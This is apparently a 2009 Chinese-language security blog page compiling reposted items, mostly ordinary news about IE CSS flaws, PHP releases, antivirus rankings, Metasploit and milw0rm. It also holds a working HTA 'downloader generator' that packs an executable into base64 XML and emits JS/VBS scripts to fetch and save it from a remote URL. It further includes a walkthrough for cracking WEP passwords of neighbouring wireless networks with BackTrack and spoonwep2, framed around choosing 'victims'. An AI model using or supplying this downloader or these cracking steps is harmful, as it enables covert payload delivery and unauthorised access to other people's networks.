網絡安全信息與動態週報-2009年第1期

 關於CNCERT
國家計算機網絡應急技術處理協調中心（簡稱國家互聯網應急中心，CNCERT/CC）成立於1999年9月，是工業和信息化部領導下的國家級網絡安全應急機構，具體負責協調我國各計算機應急組織（CERT）共同處理國家公共互聯網上的緊急安全事件，為國家公共互聯網、重要信息基礎設施以及關鍵部門提供計算機網絡安全監測、預警、應急、防範等服務和技術支持，收集、核實、彙總、發佈有關互聯網網絡安全的權威信息，組織國內網絡安全應急組織參與國際網絡安全合作和交流等事宜。

網址：www.cert.org.cn


週報內容如下：

一、本週網絡安全基本態勢（11月16日-11月22日）
●  本週活躍惡意域名
●  本週活躍惡意代碼
●  本週重要漏洞
二、業界新聞速遞
●  政府監管和政策法規動態
●  網絡安全事件與威脅
●  業界動態

官網下載:  點擊下載  假使官網速度過慢 可嘗試本站下載

本站下載:  點擊下載

XMLDOM下載者生成器(xmldown.hta)

以下代碼保存成hta文件，可生成js和vbs下載者

<HTA:APPLICATION
    ID="xmldown"
    Caption="yes"
    SCROLL="auto"
     border="none"
     borderStyle="static"
     SINGLEINSTANCE="yes"
     maximizebutton="no"
     BORDER="no"
     icon="dxdiag.exe">
<script language=vbs>

Sub Window_onLoad
    window.resizeTo screen.width/1.6,screen.height/3
    window.moveTo 200,200

End Sub

Sub CreateXml(path,File)
  
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open()
    objStream.LoadFromFile(Path)
    objStream.position = 0
   
Set XmlDoc = CreateObject("Microsoft.XMLDOM")
    XmlDoc.async = False
    Set Root = XmlDoc.createProcessingInstruction("xml", "version='1.0' encoding='UTF-8'")
    XmlDoc.appendChild(Root)
    XmlDoc.appendChild(XmlDoc.CreateElement("root"))
    Set Xfile = XmlDoc.SelectSingleNode("//root").AppendChild(XmlDoc.CreateElement("file"))
    Set Xstream = Xfile.AppendChild(XmlDoc.CreateElement("stream"))
    Xstream.SetAttribute "xmlns:dt", "urn:schemas-microsoft-com:datatypes"
    Xstream.dataType = "bin.base64"
    Xstream.nodeTypedValue = objStream.Read()
    XmlDoc.Save(File)
    Set XmlDoc = Nothing
Set Root = Nothing
    Set objStream=Nothing
   
   
End Sub

Function x(obj)
Set x=document.getElementById(obj)
End function

Function Findfile(str)
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(str) Then
findfile=true
Else
findfile=false
End If
End Function

Function jsdown()
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile((CreateObject("WScript.Shell")).CurrentDirectory&"\jsdown.js",2,true)
.write x("jsdown").value
end with
end function

Function vbsdown()
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile((CreateObject("WScript.Shell")).CurrentDirectory&"\vbsdown.vbs",2,true)
.write x("vbsdown").value
end with
end function
</script>
<body>
<h4>1.生成下載用的xml文件</h4>
選擇下載的exe文件：<input type=file name="file1" id="file1" size="20">
保存路徑 <input type=text name="path" id="pathname" value="c:\down.xml" size="20">
<input type="button" value="生成xml文件" onclick='vbs:CreateXml x("file1").value,x("pathname").value:If Findfile(x("pathname").value) = true Then msgbox("生成成功，請傳到某個空間"):x("url").innerHTML="<font color=red>生成成功，請傳到某個空間</font>"'> <br>
<h4>2.生成下載者</h4>
<button onclick='vbs:jsdown():If Findfile("jsdown.js") = true Then msgbox "生成成功":x("url").innerHTML="用法是cscript jsdown.js xmlurl savepath"' >生成js下載者</button><button onclick='vbs:vbsdown():If Findfile("vbsdown.vbs") = true Then msgbox "生成成功":x("url").innerHTML="<font color=blue>用法是cscript vbsdown.js xmlurl savepath</font>"'>生成vbs下載者< /button><br><br><br><br>
<div id="url"></div>

<textarea style="visibility:hidden" name=jswodn id=jsdown rows="1" cols="1">
var objArgs = WScript.Arguments;
var objXmlFile =new ActiveXObject("Microsoft.XMLDOM");
objXmlFile.async=false;
objXmlFile.load(objArgs(0).toLowerCase());
do
{
WScript.sleep(100);
}
while (!objXmlFile.readyState == 4)

if (objXmlFile.readyState == 4)
{
var objStream = new ActiveXObject("ADODB.Stream")
var objNodeList =objXmlFile.getElementsByTagName("stream")[0].nodeTypedValue

with(objStream)
{
objStream.Type = 1;
objStream.Open();
objStream.Write(objNodeList);
objStream.SaveToFile(objArgs(1).toLowerCase(),2);
objStream.close();
     }
}

delete objXmlFile;
delete objStream;

</textarea>

<textarea style="visibility:hidden" name=vbswodn id=vbsdown rows="1" cols="1">
Set objXmlFile = CreateObject("Microsoft.XMLDOM")
objXmlFile.async=false
objXmlFile.load(Wscript.arguments(0))
Do While objXmlFile.readyState<>4
wscript.sleep 100
Loop
If objXmlFile.readyState = 4 Then

Set objNodeList = objXmlFile.documentElement.selectNodes("//file/stream")
Set objStream = CreateObject("ADODB.Stream")
     With objStream
      .Type = 1
      .Open
      .Write objNodeList(0).nodeTypedvalue
      .SaveToFile Wscript.arguments(1), 2
      .Close
     End With
Set objStream = Nothing

End If
   
Set objXmlFile = Nothing
</textarea>
</body>

註: 本文轉載自網路 非原創

轉載自 teN.potgnayiaH.wwW vbs小鋪  原文

用 XMLDOM 和 ADODB.Stream 實現base64編碼解碼

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title> 用 XMLDOM 和 ADODB.Stream 實現base64編碼解碼 </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css" title="">
#textarea1,#textarea3,#textarea5 { background-color: #EEEEEE; }  
</style>
</head>

<body>

<h3>用 XMLDOM 和 ADODB.Stream 實現base64編碼解碼</h3>
<h5>By: CuiXiPing(無心)</h5>

<h4>1.對文件的base64編碼</h4>

<input type=file name="file1" id="file1" size="50">
<input type="button" value="base64編碼" onclick="if(!file1.value){alert('請選擇文件 ')}else{textarea1.value=Base64EncodeFile(file1.value)}">
<br>
<textarea id="textarea1" rows="6" cols="80" readOnly></textarea>

<h4>2.對文本的base64編碼</h4>

<input type="button" value="base64編碼" onclick="textarea3.value=Base64EncodeText(textarea2.value)">
<br>
<textarea id="textarea2" rows="4" cols="40">堅決抵制日貨</textarea>
<textarea id="textarea3" rows="4" cols="40" readOnly></textarea>

<h4>3.對文本的base64解碼</h4>

<input type="button" value="base64解碼" onclick="textarea5.value=Base64DecodeText(textarea4.value)">
<br>
<textarea id="textarea4" rows="4" cols="40">vOG+9rXW1sbI1bv1</textarea>
<textarea id="textarea5" rows="4" cols="40" readOnly></textarea>

<script language="javaScript">
<!--  
function Base64EncodeFile(fileSpec){  
var xml_dom = new ActiveXObject("MSXML2.DOMDocument");  
var ado_stream = new ActiveXObject("ADODB.Stream");  
var tmpNode = xml_dom.createElement("tmpNode");  
tmpNode.dataType = "bin.base64";  

ado_stream.Type = 1; // 1=adTypeBinary   
if(ado_stream.state==0){ // 0=adStateClosed 1=adStateOpen
ado_stream.Open();  
}  
ado_stream.LoadFromFile(fileSpec);  
tmpNode.nodeTypedValue = ado_stream.Read(-1); // -1=adReadAll
ado_stream.Close();  

return tmpNode.text;  
}  
function Base64EncodeText(TextStr){  
var xml_dom = new ActiveXObject("MSXML2.DOMDocument");  
var ado_stream = new ActiveXObject("ADODB.Stream");  
var tmpNode = xml_dom.createElement("tmpNode");  
tmpNode.dataType = "bin.base64";  

ado_stream.Charset = "gb2312";  
ado_stream.Type = 2; // 1=adTypeBinary 2=adTypeText
if(ado_stream.state==0){ // 0=adStateClosed 1=adStateOpen
ado_stream.Open();  
}  
ado_stream.WriteText(TextStr);  
ado_stream.Position = 0;  
ado_stream.Type = 1; // 1=adTypeBinary 2=adTypeText
tmpNode.nodeTypedValue = ado_stream.Read(-1); // -1=adReadAll
ado_stream.Close();  

return tmpNode.text;  
}  
function Base64DecodeText(Base64Str){  
var xml_dom = new ActiveXObject("MSXML2.DOMDocument");  
var ado_stream = new ActiveXObject("ADODB.Stream");  
var tmpNode = xml_dom.createElement("tmpNode");  
tmpNode.dataType = "bin.base64";  
tmpNode.text = Base64Str;  

ado_stream.Charset = "gb2312";  
ado_stream.Type = 1; // 1=adTypeBinary 2=adTypeText
ado_stream.Open();  
ado_stream.Write(tmpNode.nodeTypedValue);  
ado_stream.Position = 0;  
ado_stream.Type = 2; // 1=adTypeBinary 2=adTypeText
var str = ado_stream.ReadText(-1); // -1=adReadAll
ado_stream.Close();  

return str;  
}  
//-->
</script>
</body>
</html>

註: 本文轉載自網路 非原創

轉載自 teN.potgnayiaH.wwW vbs小鋪 原文

Top Standalone Antivirus Software for 2010

We looked at eleven antivirus packages from around the world. G-Data Antivirus 2010 wins for its outstanding malware detection; Norton Antivirus 2010 comes in a close second thanks to its polished interface.
Edited by Nick Mediati, PC World

1. G-Data Antivirus 2010
 
2. Symantec Norton Antivirus 2010
 
3. Kaspersky Lab Anti-Virus 2010

4. BitDefender Antivirus 2010
5. Panda Antivirus Pro 2010
6. F-Secure Anti-Virus 2010
7. Avira AntiVir Premium
8. Trend Micro AntiVirus Plus AntiSpyware 2010
9. Eset Nod32 Antivirus 4
10. McAfee Antivirus Plus 2010
11. Alwil Avast! 4.8 Professional Edition

註: 本文轉載自網路 非原創

轉載自 PCWorld 原文

PHP 5.3.1 Released!

The PHP development team would like to announce the immediate availability of PHP 5.3.1.

This release focuses on improving the stability of the PHP 5.3.x branch with over 100 bug fixes, some of which are security related. All users of PHP are encouraged to upgrade to this release.

Security Enhancements and Fixes in PHP 5.3.1:

• Added "max_file_uploads" INI directive, which can be set to limit the number of file uploads per-request to 20 by default, to prevent possible DOS via temporary file exhaustion.
• Added missing sanity checks around exif processing.
• Fixed a safe_mode bypass in tempnam().
• Fixed a open_basedir bypass in posix_mkfifo().
• Fixed failing safe_mode_include_dir.
  

 Further details about the PHP 5.3.1 release can be found in the release announcement, and the full list of changes are available in the ChangeLog.

註: 本文轉載自網路 非原創

轉載自 PHP 原文

Microsoft Internet Explorer CSS 遠程代碼執行漏洞

前幾天有發佈簡易的
再發一篇較清楚點的訊息
內容是中文的
有興趣的也可以從連結或是自行連至微軟網站觀看詳細的訊息資料

正文開始：

安全漏洞：CN-VA09-113
發佈日期：2009年11月24日
漏洞類型：遠程執行代碼
漏洞評估：嚴重
受影響的軟件：
    Windows XP、Windows Server 2003、Windows Vista及Windows Server 2008操作系統上的IE6及IE7，Microsoft Windows 2000 Service Pack 4上的Explorer 6 Service Pack 1。

不受影響的軟件：
    IE8

漏洞描述：
    微軟公司IE瀏覽器存在「STYLE對象錯誤引用」高危安全漏洞，遠程攻擊者可利用此漏洞誘使用戶訪問惡意網頁，進而在用戶系統上可執行任意指令。漏洞信息詳細描述：當用戶訪問了設置為特定屬性的CSS STYLE對象時，會導致函數調用流程發生變化，攻擊者從而可以獲取用戶系統權限。受影響的系統包括IE 6和IE7。該漏洞利用較為簡單，漏洞信息和攻擊代碼已公開，微軟公司尚未發佈針對該漏洞的補丁程序。CNCERT建議廣大互聯網用戶暫時禁用IE的 JavaScript功能，直至官方提供相應的補丁。如發現有關攻擊活動請及時與CNCERT聯繫。

參考信息：
http://www.microsoft.com/technet/security/advisory/977981.mspx
http://www.vupen.com/english/advisories/2009/3301
http://sec.chinabyte.com/192/11040192.shtml
http://www.anqn.com/changshang/jinshan/2009-11-25/a09120296.shtml



信息提供者：
    微軟

其它信息：

相關CVE編號：
    CVE-2009-3762

漏洞報告文檔編寫：

CNCERT/CC

安全公告文檔編寫：

CNCERT/CC
-----------------------------------------------------------------------------------

CNCERT/CC在發佈安全公告信息之前，都力爭保證每條公告的準確性和可靠性。然而，採納和實施公告中的建議則完全由用戶自己決定，其可能引起的問題和結果也完全由用戶承擔。是否採納我們的建議取決於您個人或您企業的決策，您應考慮其內容是否符合您個人或您企業的安全策略和流程。

在任何情況下，如果您確信您的計算機系統受到危害或是攻擊，我們鼓勵您及時告知國家計算機網絡應急技術處理協調中心：http://www.cert.org.cn/servlet/Incident

同時，我們也鼓勵所有計算機與網絡安全研究機構，包括廠商和科研院所，向我們報告貴單位所發現的漏洞信息。我們將對所有漏洞信息進行驗證並在CNCERT/CC網站公佈漏洞信息及指導受影響用戶採取措施以避免損失。

註: 本文轉載自網路 非原創

轉載自 網絡安全資訊與受理平台 原文

PHP漏洞代碼可以自我植入GIF文件中

根據SANS研究院互聯網風暴中心(ISC)的一篇博客文章介紹，PHP漏洞代碼在GIF文件開始部分合法圖像的幫助下可以簡單的逃過網站的防禦。SANS安全博客寫到「這是傳遞漏洞代碼到其它地方的一種精明的方法，通過旁路網絡安全工具根本不會引發警報或引起注意。」

惡意攻擊者可以將PHP漏洞代碼植入一個圖形文件中。PHP是經常用來開放動態網站的一種編程語言。

SANS研究院首席研究員Johannes Ullrich說到：「一旦這種類型的惡意GIF文件被上傳到服務器後，通過遠程在該系統上部署更多的漏洞代碼可能會造成嚴重的破壞。」

當用戶下載並瀏覽圖片時，服務器解析PHP代碼然後漏洞代碼就會被執行。

Ullrich表示，在過去的六個月中，這種技術突然出現時主要發生在小型家庭網站上，最近更多的發生在大型圖片庫網站上。

註: 本文轉載自網路 非原創

轉載自 51CTO.COM  原文

用 BT3 破解無線網絡WEP,WPA密碼

大家不要看WEP生成的密碼那麼多位，其實破解起來快的話，10分鐘就出來了，所以最好還是做些安全措施吧

下邊是命令行格式，估計很多朋友看不懂，只是留給需要的人，迫不及待的朋友請往下拉！
1、準備工作
一台電腦 或者 一台筆記本電腦
一塊無線網卡(或者筆記本內置無線網卡)
1G的U盤，Vmware，刻錄機三者有其一即可(推薦用U盤)
以下兩個列表分別是經過測試可用BT3進行破解無線網絡的無線網卡和筆記本，請大家對照一下，其實沒有你自己網卡的型號也無所謂，可以試一下，因為自己在電腦店打工，隨便拿了一台也沒管是啥型號的就破解成功了。汗一下~~~
筆記本型號
http://backtrack.offensive-security.com/index.php/HCL:Laptops
網卡型號
http://backtrack.offensive-security.com/index.php/HCL:Wireless

2、下載BT3或BT4
BT3全稱Back Track 3，這是一個linux環境的便攜系統，可以放到U盤或者光盤中啟動，對本身硬盤沒有影響，無需在本地安裝，現在已經有BT4的BETA版了，喜歡嘗鮮的朋友可以試一下
是圈內非常著名的黑客攻擊平台，說白了就是一個封裝好的Linux操作系統，內置大量的網絡安全檢測工具以及黑客破解軟件等。BT3因可以方便的破解無線網絡而出名，其中內置的spoonwep是一個非常強悍的圖形化破解WEP無線網絡密碼的工具。
官方網站
http://www.remote-exploit.org/
BT3, BT4下載地址鏈接
http://www.remote-exploit.org/backtrack_download.html
其中有ISO格式，U盤格式，還有虛擬機Vmware格式的，大家各取所需，這裡我用的是U盤版(工具比較全)，為什麼?大家沒看到那個Extended麼?

3、下載Spoonwep2
Spoonwep2這個軟件。非常方便，能夠先掃瞄，再選擇，不用再輸入MAC，破解IV也是自動的，無須在命令行下輸入煩瑣的命令。
spoonwep2是在原來的版本基礎之上的更新之作，讓使用者可以更加方便的進行對無線網絡的掃瞄、抓包或者注入抓包，破解密碼。
互聯網上有很多基於BT3進行WEP密碼破解的教程，都是用的spoonwep2做的範例。而BT3中默認裝的是spoonwep，所以趕快升級吧，免得到時候版本不對搞的自己莫名其妙。
spoonwep2下載地址：
http://www.butian.org/security/software/protect/707.html

4、安裝
將U盤清空，把剛才的bt3final_usb.iso解開到U盤，大約780M，共兩個目錄/BOOT/和/BT3/
把spoonwep2.lzm解壓縮到U盤上，放到/BT3/modules/下面
打開BOOT目錄，運行bootinst.bat
有可能出錯提示要加 -f 參數，原因是系統把U盤認成了「本地磁盤」而非「可移動磁盤」。然後再運行bat，安裝就成功了。如果你的系統是把U盤認成「可移動磁盤」那就無須添加-f。

5、啟動
製作完啟動U盤之後，插入U盤，重啟，將BIOS設置成U盤啟動即可，我們就可以進入BT3系統了
首頁面有很多選項，我們選擇第一個"BT3 GRAPHICS MODE KDE" 就可以了，進去後，可以看到漂亮的黑色BACK TRACK的Linux系統桌面。

6、破解

如圖所示，在菜單欄中單擊即可啟動spoonwep2，或者在終端窗口裡輸入「spoonwep」，也能啟動

選擇無線網卡，選擇無線網卡，根據自己的選吧(實在不會都都試一下，看哪個能搜到信號就用哪個)驅動選normal，因為作為攻擊端，我們並不清楚對方WEP的密碼是多少，所以選unknown victim。選好後點下面的next。

進入「Victims Discovery」。點右邊LAUNCH，系統開始掃瞄周邊的無線網絡。

搜索信號完成後，會看到很多無線網絡(如果你沒搜到，不是網卡選擇錯誤就是附近沒人用無線網絡)選擇其中一個，在軟件下方會看到此AP的客戶端，選擇其中 DATA比較多的一台(因為我們是根據分析數據包來破解密碼的，所以數據包越多破解的速度越快)選擇後，如圖所示我們有4種攻擊方式，2種分析數據模式 (64位或者128位)，都選擇好，點擊LAUNCH，等就可以了下圖右下角是破解成功的例子，紅色即為WEP密碼。

基本上DATA比較快的話，搜索大概15-20分鐘就會出密碼了，碰到對方下載那就更好了，如果對方在寫WORD，聊QQ的話。換一台吧！

註: 本文轉載自網路 非原創

轉載自 紅客聯盟 原文

ASUS best, HP worst for notebook reliability

也是一篇lag文

內容是國外筆電損壞率的統計調查分析，
樣本數三萬的樣子，

結論就如同標題一樣，
這也是另一種台灣之光嗎? (哈
名次如下囉：
1. Asus
2. Toshiba
3. Sony
4. Apple
5. Dell
6. Lenovo
7. Acer
8. Gateway
9. HP

有興趣的可以看一下原文，內容都是英文字就是了。

小紅傘(Avira)官方繁中版

也是個不算新的消息...

想必紅傘迷(?!)應該都知道台灣將由吉瑞科技來代理引進小紅傘(Avira)全系列產品，而率先推出的是「小紅傘網路安全大師9繁體中文版BETA」，而目前只開放約500名網友來進行中文版測試，時間由09年11月16日開始，詳情各位可以見吉瑞科技的論壇說明，安裝說明的話也可至重灌狂人的站點觀看，圖文並茂，相當詳細！


而由於目前V9的中文化是由吉瑞科技所負責的，
由於翻譯略嫌粗糙，所以讓廣大的網民來測試
是否在中文化後，造成某些功能無法正常運作，
從論壇上得知V10的中文化將會是由原廠來負責的呢！
期待吧! :D

2009-11-17: Metasploit 3.3 Released!

Metasploit 3.3 Released!

情报有点旧了       ><"
大家都晓得这款软体相当知名
but 小弟是本身没使用过
但据说用过的都说好
希望能一直free下去~

欲下载、收看请前往  官方网站

南京銥迅發現微軟IE7.0 異常CSS導致內存破壞漏洞

原文如下：

                      發表時間：2009-11-20 12:39:26
1．漏洞介紹
在XHTML 1.0標準下，使用特殊構造的CSS樣式，在Internet Explorer 7.0 打開特定的網頁後，Internet Explorer 7.0將發生內存崩潰，EIP指針將訪問0x70613e5b附近的內存區域。如果將0x70613e5b附近覆蓋特殊的機器碼，就可以執行任意命令。

2．漏洞危害(危害等級高)
黑客如果將含有「漏洞利用程序的網頁」置於網站上，瀏覽過含有「漏洞利用程序的網頁」的客戶端將被運行特洛伊木馬。

3．通知途徑
已經向「國家漏洞庫」提交。

註: 本文轉載自網路 非原創

轉載自 銥迅訊息 原文

[IN]SECURE ISSUE 23 (November 2009)

知名安全雜誌( [IN] SECURE )新的一期已經發佈了

有興趣的讀者趕緊下載吧~

內容：

• Microsoft's security patches year in review: A malware researcher's perspective
• A closer look at Red Condor Hosted Service
• Report: RSA Conference Europe 2009, London
• The U.S. Department of Homeland Security has a vision for stronger information security
• Q&A: Didier Stevens on malicious PDFs
• Protecting browsers, endpoints and enterprises against new Web-based attacks
• Mobile spam: An old challenge in a new guise
• Report: BruCON security conference, Brussels
• Study uncovers alarming password usage behavior
• Elevating email to an enterprise-class database application solution
• AND MORE!

官網下載:  點擊下載  假使官網速度過慢 可嘗試本站下載

 本站下載:  part1  part2

milw0rm 站長復活...?!

如標題

原文

我被耍了嗎...

milw0rm 的站長去世了

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

:o(

原文

R.I.P. ><"